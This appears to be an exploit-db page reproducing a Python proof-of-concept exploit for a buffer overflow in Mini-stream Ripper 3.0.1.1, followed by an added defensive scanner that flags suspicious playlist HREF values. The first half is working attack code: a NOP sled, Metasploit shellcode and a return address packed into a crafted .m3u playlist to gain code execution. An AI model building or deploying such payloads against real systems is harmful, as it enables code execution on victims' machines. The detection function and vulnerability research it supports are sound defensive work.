Mini-stream Ripper 3.0.1.1 – ‘.m3u’ HREF Buffer Overflow

  • Author: l3D
    Date: 2010-03-10
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/11682/
  • #!/usr/bin/env python
    #Mini-stream Ripper 3.0.1.1 (.m3u) Buffer Overflow Code Execution
    #Software Link: http://www.mini-stream.net/downloads/Mini-streamRipper.exe
    #Author: l3D
    #Site: http://xraysecurity.blogspot.com
    #IRC: irc://irc.nix.co.il
    #Email: pupipup33@gmail.com
    
    nops1='\x90'*0x2a80
    #system("calc") - Metasploit.com
    shellcode=("\xb8\x19\xfc\x3c\x9b\xd9\xc4\x31\xc9\xb1\x32\xd9\x74\x24\xf4"
    "\x5b\x83\xeb\xfc\x31\x43\x0e\x03\x5a\xf2\xde\x6e\xa0\xe2\x96"
    "\x91\x58\xf3\xc8\x18\xbd\xc2\xda\x7f\xb6\x77\xeb\xf4\x9a\x7b"
    "\x80\x59\x0e\x0f\xe4\x75\x21\xb8\x43\xa0\x0c\x39\x62\x6c\xc2"
    "\xf9\xe4\x10\x18\x2e\xc7\x29\xd3\x23\x06\x6d\x09\xcb\x5a\x26"
    "\x46\x7e\x4b\x43\x1a\x43\x6a\x83\x11\xfb\x14\xa6\xe5\x88\xae"
    "\xa9\x35\x20\xa4\xe2\xad\x4a\xe2\xd2\xcc\x9f\xf0\x2f\x87\x94"
    "\xc3\xc4\x16\x7d\x1a\x24\x29\x41\xf1\x1b\x86\x4c\x0b\x5b\x20"
    "\xaf\x7e\x97\x53\x52\x79\x6c\x2e\x88\x0c\x71\x88\x5b\xb6\x51"
    "\x29\x8f\x21\x11\x25\x64\x25\x7d\x29\x7b\xea\xf5\x55\xf0\x0d"
    "\xda\xdc\x42\x2a\xfe\x85\x11\x53\xa7\x63\xf7\x6c\xb7\xcb\xa8"
    "\xc8\xb3\xf9\xbd\x6b\x9e\x97\x40\xf9\xa4\xde\x43\x01\xa7\x70"
    "\x2c\x30\x2c\x1f\x2b\xcd\xe7\x64\xc3\x87\xaa\xcc\x4c\x4e\x3f"
    "\x4d\x11\x71\x95\x91\x2c\xf2\x1c\x69\xcb\xea\x54\x6c\x97\xac"
    "\x85\x1c\x88\x58\xaa\xb3\xa9\x48\xc9\x52\x3a\x10\x0e")
    nops2='\x90'*(0xa9ff-len(nops1+shellcode))
    ret='\x30\x3D\x0D'
    payload=nops1+shellcode+nops2+ret
    
    evil="""<ASX Version="3.0">
    <ENTRY>
    <REF HREF="https://www.exploit-db.com/exploits/11682/%s"/>
    </ENTRY>
    </ASX>
    """ % payload
    
    bad=open('crash.m3u', 'w')
    bad.write(evil)
    bad.close()
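
A defensive check for the kind of playlist the script above writes, as an added example that is not part of the original exploit-db entry: it scans raw playlist bytes and flags REF HREF values that are oversized, contain long 0x90 runs, or contain non-printable bytes. The thresholds, the function name and the sample inputs are assumptions constructed for this example.

```python
import re

# Assumed limits (not from the original page); tune for your environment.
MAX_HREF_LEN = 2048   # legitimate stream URLs are far shorter than this
MIN_SLED_RUN = 32     # consecutive 0x90 bytes treated as a NOP-style filler run

# Work on raw bytes. The value ends at a quote that closes the tag, or at end
# of data if the attribute is never closed (truncated or malformed file).
HREF_RE = re.compile(rb'HREF\s*=\s*"(.*?)(?:"\s*/?>|\Z)', re.IGNORECASE | re.DOTALL)
SLED_RE = re.compile(rb'\x90{%d,}' % MIN_SLED_RUN)


def scan_playlist(data: bytes):
    """Return [(offset, length, reasons)] for each suspicious HREF value."""
    findings = []
    for m in HREF_RE.finditer(data):
        value = m.group(1)
        reasons = []
        if len(value) > MAX_HREF_LEN:
            reasons.append("oversized")
        if SLED_RE.search(value):
            reasons.append("nop-run")
        # URLs should be printable ASCII; raw binary in HREF is a red flag.
        if any(b < 0x20 or b > 0x7E for b in value):
            reasons.append("non-printable")
        if reasons:
            findings.append((m.start(1), len(value), reasons))
    return findings


# Constructed sample inputs (harmless filler only, no payload).
BENIGN = (b'<ASX Version="3.0">\n<ENTRY>\n'
          b'<REF HREF="http://radio.example/stream.mp3"/>\n</ENTRY>\n</ASX>\n')
OVERSIZED = (b'<ASX Version="3.0"><ENTRY><REF HREF="http://radio.example/'
             + b'A' * 0xA9FF + b'"/></ENTRY></ASX>')
FILLER_RUN = (b'<ASX Version="3.0"><ENTRY><REF HREF="'
              + b'\x90' * 64 + b'"/></ENTRY></ASX>')

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN), ("oversized", OVERSIZED),
                         ("filler-run", FILLER_RUN)):
        print(name, scan_playlist(sample))
```

The same function can be applied to `.m3u` or `.asx` files at a mail gateway or download proxy by passing it the file's bytes read in binary mode.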